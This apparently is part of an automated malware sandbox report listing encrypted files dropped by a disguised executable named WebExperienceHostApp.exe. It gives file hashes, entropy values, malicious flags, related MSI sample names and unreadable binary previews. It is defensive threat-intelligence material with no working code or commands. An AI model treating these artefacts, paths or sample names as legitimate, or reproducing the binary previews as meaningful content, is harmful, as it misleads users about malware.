                                                                  Entropy (8bit):7.994957193282963
                                                                  Encrypted:true
                                                                  SSDEEP:768:P6ZAKfHTX5v3gb9y4feQ+OHFAD3fdB4e61:jKvbpIf8MAD3fW1
                                                                  MD5:5DC8558DE5DF3DC0D6F357BA62F0DF2A
                                                                  SHA1:8314B32BE69CD99BF3FBBDAE8BCEA646496828B9
                                                                  SHA-256:84A3ED840139AA17280E6D2351ACF2EB31D8FE56FE2A87FBED5C1AC155E21072
                                                                  SHA-512:D1D1EE6554E071E8C1FAC5443DA7E94197ADA81618CB37757FF14B9D4A334AE524FA13BA209FE11A7ED9EF3A5F7E138CC10F8681A7DB8AC9287ADF36EEB1E94B
                                                                  Malicious:true
                                                                  Preview:p...|:hC|.d.I.....3.EL..,.q.5...".~...8.Ynl.d.....f....E.r.,kG.....%..Za.........E...._.....~...%.r.jV....x.mE;d..bXX.FP.3O...4..eO.X ..M.uZc'.FE.w..^...)...........h =. .W..)..O..{.|...dD...Y...x......*.....;t.l.........y.......~..S9"<.c...........8....Z...BA.~.i9_. O.......+.6Q..v..d6...+..~.FH..Y.cp|.....|..._.M..+2*s"...:................4.R{-]`..._.-M..W.....X....#.P..&...R....m.y@..4 I.Aj,U.botN.;...|.nP ..QY..vc.H..S..;Q......A....4.aA.../...]...7."..r"..N<..8.y....^k!./.].f.T..fX...>..PM.{.x....o....BP....^.LV..N,f.2..P.....?.........Y....Q...U....c.o.X..I.SA7...%....[...(.mE..............}..........._.....|U0/(Wv.0..Hd.,.H}.s..r.......@.dFu^.n.[.1..)8.03.....E.-.Eu..u..P.1<.T%....M..d.......g=.=3s...'X.x....,...u..j....!..7.c.....>....V..A.#)...tA<?.X@...."..2".....b".........@9.$....\......go.]..R..b&....DD.BVv|..D......U:K..L....$.K..P..2....y`...J.}...p..->..`...2.Y.....:;l..CK;<l.gV.4.^.q..O..D^T<.._...n..Nc.a..?...C
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):87900
                                                                  Entropy (8bit):7.997870438352977
                                                                  Encrypted:true
                                                                  SSDEEP:1536:P5w83TlWt4tJ3XyZgF3P9VVl/zfGHqyz7e9Kw5LG9v2gIhgMCm0nm:PSN03iZw9Vbs7e9KkMpIDCmkm
                                                                  MD5:A110D0CA4523D2E30FFACBB9525FBA66
                                                                  SHA1:383853E845377B4958C757C82547E3DF3E011963
                                                                  SHA-256:737443FEFD8C0F0CB7216B41C370CE1B0FF8C0A24AAB21786FB3BA937FCBDFB2
                                                                  SHA-512:B4F57C850BFF0B13C9FE839D651E7045DA9630EB8BD9C6803653337E0BE2D802DF9F48EF5E82D0ED9C17BB3CDD7688178B41C6118B889C6FE50555CEB63559EF
                                                                  Malicious:true
                                                                  Preview:Q-eS.Y='.W....B..''..1.....s..!&..3..'*...+.D.w.n.L...h..l..7....[;..y..S.x5..D.....uw.]E.m...c9.r.EKeY..I..`UB.f...r .K...i.....K....V... ..b..l.ND......x...G..{.sU..Z..... ;...BMoZ|...IP..j..Il....l..B.*......Y..o.Q.vz...w..:c2x,;....k.[.#0.|..oN..D%.4.l.. ..N|...9.e......4....RCX..a....r...1.b.nHT.3?.]...n....Z..1|.&Q...G?....C.4.u.x..2..X.3.E...s+.6....b"...t....m..2C.k.R...../..dHaG.1i..2...[?.g.i..6C..@H;..%.6....En#..~*........xg}XS..,.15.Y....@..*ll..p4.S...G.x%e...))..n.<..Y.O/~9.{.R.cTK.Wu!..z .5.MT.c.r.sW.>.......u...s. .~...[..........u2..!h(.O<-..j.9.@D......?...J.BC...._.Z..n9.W..c.9~e..h.E..N....Jo.|..J:.).?X.9.....I.X%t.c...)8.BI.m...[..".#A......m...*.,e&..t.#L..ade.y."A0D.4.p.W.U:.....5.w....-.....DE...<8.S0U....bx.......$.......+J...%.....?......4..-.&0.;.1x.1....F......R(WHC....#.k.............[...y.o..P.......6]A.:....Si......*u..j....:X}..i.*<....~&.l9K...A.~(......=.&..tN+.EOf....pih.+aw....x....X...+c.c.h..U......GG
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):31016
                                                                  Entropy (8bit):7.9940900864763655
                                                                  Encrypted:true
                                                                  SSDEEP:768:mzuHoLzu4mfxB4Suyl8rUXNsidVghzvcFz9RA/5+:zYuuWuoghkFAh+
                                                                  MD5:732D06D7E503A22E4BD5095C1604B652
                                                                  SHA1:DF2F76D7B99CD3C092020871401916226983DEF1
                                                                  SHA-256:C3E19122DFF4F48340779DFDA046C1052C8879649BC34CCAAF14C23D75313ECD
                                                                  SHA-512:2060C46E53BD61C670768B80E0B81F2BB40C9570DD4CA724A5418A8042DD756A5765D7432DFB5FCBA223B89E24E0C10B32E348DEA93011A22A6CB0D9BA674DC4
                                                                  Malicious:true
                                                                  Preview:>&iFeb_nY.o /...5..D..l..F..W...Q..z.7.....}.......>\.M..[..[L.~o1.(..Hh%...a......E........[e.m.y...PK^.y%bom<..b.(>03+.8.^=z.~l.M4...&...[.h<h....$...2..S.t..?..m.....=._..(..m.}....T.3.f.{...G.......7.A...r><R.eV.v..z........|W.Y5.Khb..;...E....`..E;.u.0[s..[-..V........P.0..|G.z..&.O....W..X..~]..v.....;.y...W..a./X...]....!.*.f.....Mo..\w,.e.(z1b....-...&..........q.2....e......j..;.\...../...S%GH.S.......C..Y..:..*.e~...q...g.Wl $M../69I.^+..8.mY.p..r.\....p...E.....I.K..{..z...r...R.j..l.|v8..x..m.B.z$.*{V`..U.......)@=.!......<..O....7.>.n.:!........%+....C......9.U....E&..`..w.,....Ka.........%&.M.Kh.&..%.Yr.`$FT'.8.q...x)Y...#%}..R8..k.vo.+._@....m.5c..p.m.!Q+.p.~"#q.@.g.M.8...u..=*..r9.9..i..\L.tDN*.&.DH.k..!.d...7..j...&..J....}...a0..9>h4..[...nX(M....SL..C..7..q.....*t=B.%..m.sa{."@.6..9[N..(..>.k........4$p.]..Z.,.LIy..pf....x...C..wX[.{...X%.d..&K..?&....u..Z...K.`.Re.)7.....{.g...!..Mv$..r4....K.o.TA.......i.s...C.E...}.'EM.
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:DOS executable (COM, 0x8C-variant)
                                                                  Category:dropped
                                                                  Size (bytes):59092
                                                                  Entropy (8bit):7.996854200832269
                                                                  Encrypted:true
                                                                  SSDEEP:1536:nQcHqChxBUpDQYZNW9EGAVa9DsN22SYwL+y5BS:QP6rOZc9BRxsU2SpLJC
                                                                  MD5:1FEC938C2E85531A697E4818F32DAD98
                                                                  SHA1:ACD67DA06ACF14270895F8532B798C45E259BA66
                                                                  SHA-256:6B3265B2F82E206BED8B6CD56C2A3F0FA9D8FD027E19A9713DA618B177D9264B
                                                                  SHA-512:BB746A8EABECB682C72ECCE9EE270CADEFA1FEFCE9ECA954A613D04E62AABC7396CAA34DA5513326F9B17C753DF1CD19C4D494262D08AC91ABBB5B00E9BDF4CE
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                                  Joe Sandbox View:
                                                                  • Filename: hForm.0198840 739798.msi, Detection: malicious, Browse
                                                                  • Filename: ust_019821730-0576383.msi, Detection: malicious, Browse
                                                                  • Filename: Br_i421i2-2481-125_754864.msi, Detection: malicious, Browse
                                                                  • Filename: 181_960.msi, Detection: malicious, Browse
                                                                  • Filename: 232_786.msi, Detection: malicious, Browse
                                                                  • Filename: zHsIxYcmJV.msi, Detection: malicious, Browse
                                                                  • Filename: 18847_9.msi, Detection: malicious, Browse
                                                                  Preview:..l......q.33....Ve$.6'i.......".b.:.e%..2"c*A..`...K.#wV..^.......$...t5)kD5.]..G-......O..{.l.Bj.TJ........$.P.E(....5.*....E.....v....`.7"...n.fdm..V>V.|.J..qu9..;.t...h.E.:v... ...v.l..H}...P0R......;....R.q..}b.#~~.....z~.:.L....p...r....]:..z<s...Y.)w4.?%S+.:..{A.i.-...!....../,..1.....0..2.z..p.Q..V.b..W. .....*.>...!g..78..or.......S..2..A|.ck=..e......f........r.6..|9..%N.......j+.^..a.C.iAw7ML..I..N*(4.~.;k7fdy.../.U:R....0v......mO..-.[,..Q..P..Z....A...qFWO.........(...".?.Th`..}..sQ.......^.#u.6..B/.Z..C..o......Lw....N........=..,.0...j'.9.....`...Ks...........V..3%..N.k.B..wl.....F.k..k...{..4p5X.9f.I\J)%.r.F.#J.1..(.......U.#....!QN..........e-0..2.......1Ra....Y.ar.u.tP...Y...K..\h....?W...c.k.{.z.y....kK.)6-..........F+.....W... .O..?....a.l..-.".~.A.7w..........h}fSn4......p:77d...%...$"Hh.o......5a.@.^.J,..l........ze.W.~..ps"...-....-n....2..\....T...A.9=...^......r.1]..g...... ).......B/..yS;T6.e..(.tG..V.....A....
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):99566
                                                                  Entropy (8bit):7.998142581654128
                                                                  Encrypted:true
                                                                  SSDEEP:1536:11pBXOaib3JcpNn3unOqtp5NKGeoNgFcoSS6HNPdeC7vrFG6M6f8E10VOQLwt:11uFcpFenbtfNKt1SS6t1V7xGdJE1w0
                                                                  MD5:8FC1319E8467E8BD4D1BA7C51AD77EDC
                                                                  SHA1:18B3BD1589F80DA0C3ACDB74B31543F3308867CD
                                                                  SHA-256:148AF3A3BB85DCF2E8A111FC6C2E342CD62C9B3C316352DF26F7CD5C46960E8A
                                                                  SHA-512:A159CBDC5ED761AA5D643C6CB7D7BB96C8B5CF7E162CBBAD4BF399B3109A6988095CC8BAC9C6B1D9E3EDBEBC094E8B5175FC9BB59FF6BA1F715E79BDF67888EB
                                                                  Malicious:true
                                                                  Preview:.(J7..%.c.dL..Z;yk.~>D.....o.gI.[...)..^..?....G....k..gO..P"g...g...%.......&g...iU..`@...4S...Lb...6.6.,f.....kOj...............W .=.......x.!|.k.}.@..(k6....Tv4yY.h...P..!...v.BW..u"s.c.e-.q#..S_...y_.5.....I0HK....Yh.H'.&.Z.. &..\...p.../....b.A.1~!..5....*....k.x.u.{.S9.D....c....@:.(z=.t.x.l8..x3h%..........W.3i.%>>i....F.i:.#Me....o..9...J./W.s,.$G:..]<.N>j.0...^_.7..?.v..[x..h..9...}.Vw..0.L.Q..5B.h...x..BJH...+..V1.M...);.,..1.*.B..B...b.?B..).,xF.?.7./2xK.A..i..pV.@!.h..Xl.U..P+.F..g.,.....Dd..w..!..Yp..6.,i:.@.D..$...Z...m.+.j..A..k.C...m......Or........TqY.`..^,m)..r..~<...R.S.u..H..@.....q}1a.&..C,i...x...a.s;....:LE.f.jO...=W..c..c...&O..)...).C~0..`l5..m`..i.<.....-.}...e-u&..Q...rDa.....q.......o..j.#.#..M.~z.rZ.g........F..S.._.,.H^[....k..H\7qi......-.8.W....Q.K....:...j,{>...[..$.U...f...V.....T.j..Fr....C....+..mo.7.....U......hM522G..7...mY.j.*.v.i..U.`..@..&.NC%..J...m.Q..[...P~.7r.1]...J.R~M..8.\m.{.......U.........
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:OpenPGP Public Key
                                                                  Category:dropped
                                                                  Size (bytes):32929
                                                                  Entropy (8bit):7.995142105934198
                                                                  Encrypted:true
                                                                  SSDEEP:768:2Vpo/ygeRrOP/GwLrTW8R8+DK8uRhsm8uW8RRO8oLEhXBVccV:2Y/yxqn7LrDy2K8uRYCR08VRVc2
                                                                  MD5:1A0F824790B98E5EECF3B5C4948FBBEF
                                                                  SHA1:C77586C8CC6978E898E3A82D3A9F82FBEF6DCFAA
                                                                  SHA-256:845BBDE5E4614BF9B1367EC32B60D5621F81E5D59750D4AD350DE77FDD0CEC61
                                                                  SHA-512:5BC3215F34B99D6EBB12B3282602A3B41ABC1522650C84DC1E095004B8D352C9074A01BE940D053BE2524F3CCC5E1E279094A71418D7CECDA1FDC9BDD4008B42
                                                                  Malicious:true
                                                                  Preview:.......}+v.TK...T...0.6;\..t.,.hLObgAEf..N.C....E-.-NoM.2..g...UPx... ...Y..6..f.V:.E..z\f......Q.;.c.[P[..a(.l..?.W\...q...._*...n.._...T..-..!..[W..p.2H.pH.r".E..1..6!...>.......|@....x..B.....f.?...PB...j.{.~....._.....8(..:............i2W.m......*....J.Sv\.f...)...|O.)...&....@...p5>.J.i?......J..;.%O1)..1$..L.....Yg..\.....#.u.V").....@7....q...}..W..Ds..Oqu....9.,..E......I..D..`..Om'.H..8....o.....S.e.......82.4_M..K......I.......6......!.J4Q.....R..F.....-....`jZ.SKp....iRs2:?......L.....#.-;&^....<...=^..(...>..A.2....L*...wqdd.e.......v..^..pE.....1.".....7.....[.x.n..........y...bi..j..p.u2;..mq....s&.d.....V'...'F}.4..N.T.....@..."....Ri.H.....l.-5.....RK..}g. .B...3.s.......I.:.-{V.a.......kP.'..7M..tJ.+..E......Yg..~\...(vo...nT...<...TR...7..2.k.'V[O$.c;L.qw........qqE.j.cT..x.E;.K.A3..~WqL;.=..."xa..o..h..J...O..yW.z)..C..m..A.......D*...|w....z\0.......9V.K`)...{.....0.,..G....v/....T..s...rm...>I......J.W.
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):89875
                                                                  Entropy (8bit):7.998029926157943
                                                                  Encrypted:true
                                                                  SSDEEP:1536:cg5WLAZNQ6KI1YmfSGt0V7jIjo76clkqO5zrmpcwDkq2eWjE5iax+:cg2AZNQXI1Y7EBqICp/C1aE
                                                                  MD5:4BDD26DD891E354496551B62D097635A
                                                                  SHA1:6E06C30B152564D8A0955BE716122AB025FFFD01
                                                                  SHA-256:2E57C992E9A493BFB21D02BA6C815E889DC116218792005A16CAEF8AC164C927
                                                                  SHA-512:234F2AB6F2CEDB000332E66B99CE46AB9EC9EBF836EA85BA78DA39D0E825F8A8CAA225F87E24BF50D6358540576A02FCECC833770CD8D58442EC08E3D4455B09
                                                                  Malicious:true
                                                                  Preview:..9...h...*.........J.r^.&.<. P?....5..j)^n........T..:.O...$...@.Y.iF...x....P.7.3s.I...7...3p(...a&............GN7..TJ.v.QF...".(..+......}.7 .qgw.u.8V..j.....qt..9..j...{.S....t....{........b.......~...iwX.$.e!.....ALk...w.VFs.h..rL...5 ...g.N.j/....$.0E[....}......}...c.d...U-.|....).....zd...v...>....n..F.4.(...U..Z .e...S.IUnk.4>.!..T....-...O..].i..'.B.....bp.gmGO.V.1fE.J..1..W..........\...Q..B.E !...ua....*..{.5..f.w..p.6|.Q......E].u.e|.2. ..^.nn...FO.q}......*.-$...;..Y._4..b......3K...c.p%vk..x..<..l./*.(.).:t?.2A..W....@%>_.`'z.t.8.;K....2./Pmo.%..htM\..s.Y.Z.'..]......h.l.DG.....Q..vx.S..FC..$.?.'..U....d..g.u. H.`...Z~..n....tu..#..2.B......+..2.-.g.Y....f.....~...:=x.[Q..N..N./.....@....(M4e!.N*.e.4_..Ee.>....y..My..m..&.....C.p.+!..I.0Ll..E...T...e....Rj}.P.q.......0Sb38.jt....c.!<.j..K.....{.1O...I.).PrQ..[qVN...Q.G8.45....W..ku.E..1........../...h%v.+..^..].N.j5.&.._..5\.p....m.....<.....Z}-~g....h....w..........
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):30989
                                                                  Entropy (8bit):7.9942688000816435
                                                                  Encrypted:true
                                                                  SSDEEP:768:Luarjxb2OOxXsd4yt72d7QdYiCiO47IfacSyIH97Lu:LpxE2XdYRij0yXru
                                                                  MD5:1D252CB7FD476035B10202A3B38B15CB
                                                                  SHA1:A0E2B89EF48F57E35C634F06D2D15D1B9133724B
                                                                  SHA-256:871905449CE580A5F48114234F43642EC65B4666826C1855E534B160397F13A6
                                                                  SHA-512:0BEDF0A9352B853353357930130EEDF6DE2BD2240926AAEBE882B34BC92A2FD2223C01754A26DB295FDE2E629A20EDFE1B4D3B16918310B67DA224CFA477586D
                                                                  Malicious:true
                                                                  Preview:X.'.U55rpF......p.3....{ .[d.)N...j.U.O!r..h..&%..?..Zj>@...z@..*....'&A.?.=...EY.$I0....F:.P..,...x6.....R.@..S.u.H......J.l.tN.E...;..O...V..HYt...D.e.0.o.....c...:.......r..X.....V.J=.Vw.....R...Po....Ne.X.P.u qG..!6...}.1.a....0....$.9.....5.7...N.....73^.....[s.\f..<....Q...s.9........0<.$.8y.P.l wh9SxM...;sv.y,.^.3...v../..l..tl..FQ.......8.X...(X.[.....q.....Y.E....e...|.~.....S.."........b+B....?.FT.*3...m#.......3..ee.+1.6...y.vn-z2.L.A..8.4f..b.(D.....K....I.8.{..je.:(1..@..<[.g.t........0..\sc.....$V.....>..A.%.Yh.1$...Ns.]..uehx.....!...;.:...zJ.:.-..../v5....H]_C........$j....4..f1#6FN~....x..c....\..=.d..I$.+.{&...m..3........O....[....$V[.....=.wSh'.D`>.9U..B.........Y....n.\!....z...hO..LX".&....0..%.....ar*.h......'..I.p.t.... U.x...Em.x.4.19..ZL...<"..G.......K.b...4tS.?...=...B...~.J..."g.7\.5../.f...P..W...X...).....<O..a.V.$.]...vLou.....y...!x...SP.K....N..fdE......S.n....Z......V..s.....v2.J..BP..t.j3......m.1
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):100854
                                                                  Entropy (8bit):7.998042000988432
                                                                  Encrypted:true
                                                                  SSDEEP:3072:uY5/5vmydG4HG0HmptkQep0JI/40HIUjprOka:nSydGAG0MhbJvajtE
                                                                  MD5:3EB4691C8B69D03AA006705F3AD53644
                                                                  SHA1:CD20927B17FAD837E4C4EEFCED6810BD914272D5
                                                                  SHA-256:7472270F88BC4DA345A0534DDD3E538C7A478FA360C7E216AAF5AD9A35B1941D
                                                                  SHA-512:24FD48B423F9C55C040B65977F863B7084ABD2AC78A8407802F5C6A4B41BB002537E1BDE3CEF900C89902446CB3E765A68591C75EC96D782CABF962519EA489B
                                                                  Malicious:true
                                                                  Preview:y.E...ro....=....2..h.A'...~..J.y...R.`?z..V....gW[7s"(.%...Z..y.......S.u.H..)/...Kd...mf..Q.Pj.....Pd.2.....,!.f......}..>Cd....Mw...hoc .Y.5.!..._....B@g....~.{.Uk......1..U......|!..c.........1....`H.Mje.].....X.>...RX),q4..g.!0.zlMY'tm..di;........K......?N..../..v..z.....n....pt.[...m.@...cO..CA?Pv.8N&....1h.^f/\........I.;.*..\..'....$^...%..#.3..@.....C~.....=..R......<.:.6.bb!Y2./.%...q.#..1kjsh{^....}..v....E..U~....Ir.*G.....+S.Db[...p..<.Y;Y.:.1...=1syw.1.z..\........r.....G3#.(..M...I..h...v:$.G.P...E...........=D...oA......']......R.r1..'....<.R..e...O....V.G.Sl.|..2..8K;..b.I..B.f.u"...P............z.@[.7IM"k.D...OE..#E...HdX....@.....6..n =].B. ..BL)..U..o..P.J.....jC..V$.a........H.z..].`...3T`.N.x..s..|C...:>;ze`T).T..Q.g.'+.8.&...S....qQ.E...4g..#....:.Q../4..z....mz...u.=.=.So(.~.F...Q:....'.lA8E.].g;.a..L..0".=I-.xs......B.E...b....<..%1?QmIz.p.......V.+@...Ae3._.R{.p3..`..m,a.s5g1;.8.o...#..U......N....2...X....u..
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):103706
                                                                  Entropy (8bit):7.998393214541903
                                                                  Encrypted:true
                                                                  SSDEEP:3072:iISkkVPeOOtBVZyEnLMlaHl9lASmeioqXAGhirknL:FSk40vrRng65MorGMoL
                                                                  MD5:F26BFD7BE7B6759C104C75743E35DFEB
                                                                  SHA1:8F72B1590081CB3130062E9027FFBD33AEA7BE29
                                                                  SHA-256:4B838E4CE117A89EF6F3ECBB881195D34AA69C3F6CBB6CAC5B8CE62AD68120E7
                                                                  SHA-512:87EB5CE22EEBBDD4CCA03FDB24DD5CABADEA39BF34B9F01BF6BB655CF89729BF0028350A05279586533688EE818781B9EF305EE969DB9EC164469C67F8E97158
                                                                  Malicious:true
                                                                  Preview:..7..IER..@EU.HX....)..F'g..x..."...j....p...-....$.z-H.e.(...M.........h..,...S...>...?. -/.....?E({..B...`.,j...Uz.O..59......./L.Jg........CZr.......n..n.H/..K3?!..G%3....>_N..[p....&....N...1.k.7..../...9.....:....Q....@Z..:|E?.}..Q..&.i@....(%n.....!.>.p.U.*P.|-..$<j..q..m..~...'.?.C.uT.LH.6.A...?;k..C..~..y.("?.._.K...1.E...<L@.b=..hi..9W.h'.j...i.k..X.....f.\]rr.E..........LG...u./..y.....|...D..~|6.P~._.:..z.%...UM1.....I.G"...kR.........~..rQ.T$....{.G..GTw|._.U.E..$u@..Tm..#.^.}......+.......}_..! .....l.^.WH.3ku%r.....t....vp.b.h....@.......A.L..OL......~d.._...Uq...1.(#.j...|..R....T..1.:|Fv..n.`.....h..5...%-Y.....G.Y....1Z.t~..Cp..:..\.N~i.p...]..sn.P....%.|..o.....TQ.;=......P...e.>M..P...9H.("|:*.+...F.....%7..`.......'.O.dd.."..F.Q...w.Bl.<m>...0.8A...E..F............}...b$[......f^N.s%..<MD.......D.Y......6..7.M.m......t..i^...*.*SP...k.H.@V2......7..*.<....T..zy.......'..|..!....4.b.....@.n.)..1..|q=.........#;5q.G.^8"Y..q
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):33488
                                                                  Entropy (8bit):7.994824218932575
                                                                  Encrypted:true
                                                                  SSDEEP:768:USiSWn8d8z3lZlQp0t1X9f7F4lxWZGYrPO5hMdR:JVaLa0HXF7FuxWZD0hM7
                                                                  MD5:5010E574CC4F0EA67148776AAE448C71
                                                                  SHA1:17B4C769849C30A59ADDB85E5D8ADFE66973CB66
                                                                  SHA-256:948EF0A1EFC48907DDC8C9E02735708347D047B3CEFB2CD45A818D11F12A50BD
                                                                  SHA-512:E7A7813DB86B07348D3E58D9B3E7C3E35FF7FD31E7D5CE93FD6CBAA3D4A3773382B53DE1BA7B2F078B2C920A2FC748000286DABF615AD25ECE373BB40CA6AD0D
                                                                  Malicious:true
                                                                  Preview:F.U....N.....Sa...s_.}..B~.A....t;2.....^.T.....".Z..A.>.XV.F...?..0^(@H..s9...i...h\........c..;<......a.|.s8....\9.m9.......H~..ul..7.i ..O."..s...i.S.r.mA...T[.g...C.Wo.....b....9.S.q.z_...w.=a3."D5..i...Z....|.GI6...:.._.ocL.........x..0;]..[|.....V}....C..u..tv...N...........w...ou.A..^..........G.1..s`..;:P..S..&..w.TH..../C...`..._F%tk...;z..?...nt....uy"r.t........I. ..W.}q..3YDF.......j...D.1..,\@..y.b.c!.?..P....Q..Wk......._.i......(F...).......O.E..na.l..0~....."}..G.d..9..`.V.:./.j9....(..Q..0.).Q..ev.WJ.M.....+.C.B...F....<.k........I....O........*...G...@/...c..??..(...p......Z...y.H..DF7...Y..@....l..7Q..e7..d.g.O....Vg1D.U.....Ml;Ke...z.g.d..H9|...P...h1.....=....'..\k=...'....$..g[T..l=.*w6...Q.D...o...+ ./r.&.k...p.9....&..c.5.....,v.>S.y\....w.2F..._...eL..Jw..i@G..]7.q.....d.....8..../...w4.D.....`.< ......2.(.D...m:.2..H....&.C.u.C_...X3......@..BQ..S.P8.1...gm~^.h....-..3j....n..v].0.S...(..........K..eB..w.Qc.
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):101930
                                                                  Entropy (8bit):7.9981901474610915
                                                                  Encrypted:true
                                                                  SSDEEP:1536:bFBX3e/IxRFmOEdU8Z1pgVqC2C/0gGk49jn8uWhTeZjsF9u73OoVRZ:xMQ3fCtZbDC2wutn8ZhTcjs/uT3TZ
                                                                  MD5:EB7C720674B853F883C9D6C6325CF5C7
                                                                  SHA1:F04B971CC4D1C23BD47BFA771D212C4EB5AE3426
                                                                  SHA-256:C22A92D0A3B8B305B124B6972B98B2CD6B98FE4B1A7BA50A1C0E7AA423F46250
                                                                  SHA-512:D2CF31C0B7B8309641489AB9B38B6D5F2616F48844DAB66962806CA7F08407478F0A82C138DCD784EF962D8666F3829E0B43B64EC65879FC9E10F0BC3931BCFC
                                                                  Malicious:true
                                                                  Preview:O..!n./...;F.InU$....\..-..C..c.w...,..W..X_.u....M.7jH7...H....n>.\..#XI...b.4.n....7@..4.4..z'....Hq.W.........Y]e.o0.........7s.....zQ5.<..d...3...S.....`..g....&(}.MSH8J.......,$.......k.....<.).e.O^....3o.PshZ..eLa.S\.7G{.v..(L......=M...`j.;\.k...6...s..6..H.[.^P.R.$.*..;.#.......Np.....g>.r.%#3.G.a....gN| ....Z.g2..1....K....Q...OVi..o....V.:...;......s.;.}..w...-.Z..>D5kr.e.{,.$:..1:.q.1K....X...u.i.3kK..../.............:A$.2.....p~......)..P ...S..x.`..D.?.x.a..0`{..E6T.>..K~.L0_ ...er..b..%Ct.X...?.~..M...d[[uq..+z.a.A....|V<.w....m......u.../z....V......dJ.Y2.......;e.ZZ..?Kp.F4.-....._..R.'$.#.z........Q.(..-&x<.U(....mI.........i.ra.I8 ..J..#..(.+.S.......e9.F]h.........I.M....+c.?.L.j.'.!.n<..&802A...O.g..)....p#..D.PE ....cb..*..,.8..e.7.0.:......a....,.....n..F..3.e.~{..y8.f=.,.N..:.`3..Z..1.Y.....Y....'?X..Zd..H.p.."..f...4...;Oqf.|u....>..4..+....P.kJ..$.;W..G....;',.........pW.q.v......U....+......;......N.
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):34458
                                                                  Entropy (8bit):7.995065071026279
                                                                  Encrypted:true
                                                                  SSDEEP:768:RdgRHKthT1JBcaEZjGJ3yKoXaEnj/egD2L2RqTfb1:nQqD1oFC7oXa0agSLJb1
                                                                  MD5:B5099C89149E1DE924259D2E48288985
                                                                  SHA1:7040EA8D49957FA35E5C09AA432556530C0C1A6B
                                                                  SHA-256:BAF8E0ACDDFD9ED37F0445328F13CA1BD29525000747504CE0117C827B22A0E5
                                                                  SHA-512:A1BF06A87A2A722CE3BB440CFB47C00BAC5B59CBAA109A25C096754491853768628A567EB0D70C1E2201C38DA155BFAE6D9763B50EB2D2A876C6E5AD032E5FAC
                                                                  Malicious:true
                                                                  Preview:.nv.. .>...r[."MM..9.E.p..%..o...:...[.k...?b...}..n.....+.........(.,.}..r.@.C....~n..<.s..[-YR.........-.p".......].<.>.S. .dI.L....O.i0.....Y..Q5.35=C..}.*Y...$.7;.?F.-s......)&.H..8I.|...](6.MM+..IY.o..V<.X.p?...u...U..5.....,k+tg..1....J.8...@`................."...!?..XV.#....K..I.8.3.>..5.E.&;....8.G..r5.x..zB....i.o.\~....]cff..HO..y..,..;.2jrK..-.!..P..|%.|....D>/D...oKG.g...LH.k2HmNoV.......[M|....7.=`NX...x...g...t..........Z1V..@....t...?j.d.kV...%r7..l.{.(...K...&CDD....%.......d.].i.`K]...."$2C"P.q..m....@....&* .^:.y.j.k......,\.....4.Pt.....@.<.....e...j~:dCe.br.C.fEL......C.:%...x-pO.v..*68&......cF.S.&J' .%.E..h..H..*.!q....j...rX... .f.<.&i.(...HH<..T.C.......HDP.ZQL.xP.....b..Y,.c.4..I8... S....|:r'N..i;.. ...S...a...XB.VG.O.+......?..5.....?..5#...i.~....p.-k...;....;R.....rAI=..eG]...em-.f8.!.Y..1.B.}G...|.%..N.u.i)...=.}...bc'6...Um....*.|s..N...=Q6.`.Fn.?.. .C!,...9..z..`.K.....Q.....)i*. q....>.U|./s^.....{.
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):95125
                                                                  Entropy (8bit):7.998052073557218
                                                                  Encrypted:true
                                                                  SSDEEP:1536:TDYBzwP6dHbTllbs6r0S2baOVrDykk5D2jRJa/B1QI025:TDnPkH/Q6r0Sn6Wr5aNJc0w5
                                                                  MD5:13152C5FA12D4F1599956EF00675BC54
                                                                  SHA1:6143073A465946CCF6B7C0B7910936E009E8D702
                                                                  SHA-256:43111D74515006A80C5686D339CD9622D6B537F250340EDB46DF29F64027DA8B
                                                                  SHA-512:AB913537A38A8195F6C915719F2A845A68E3C51EB1171E2FB564AE5F87F10386D3AE4BAEA3B56D3B7E9A8A63525A23802F811D2AEB854484DAA645D642A987D7
                                                                  Malicious:true
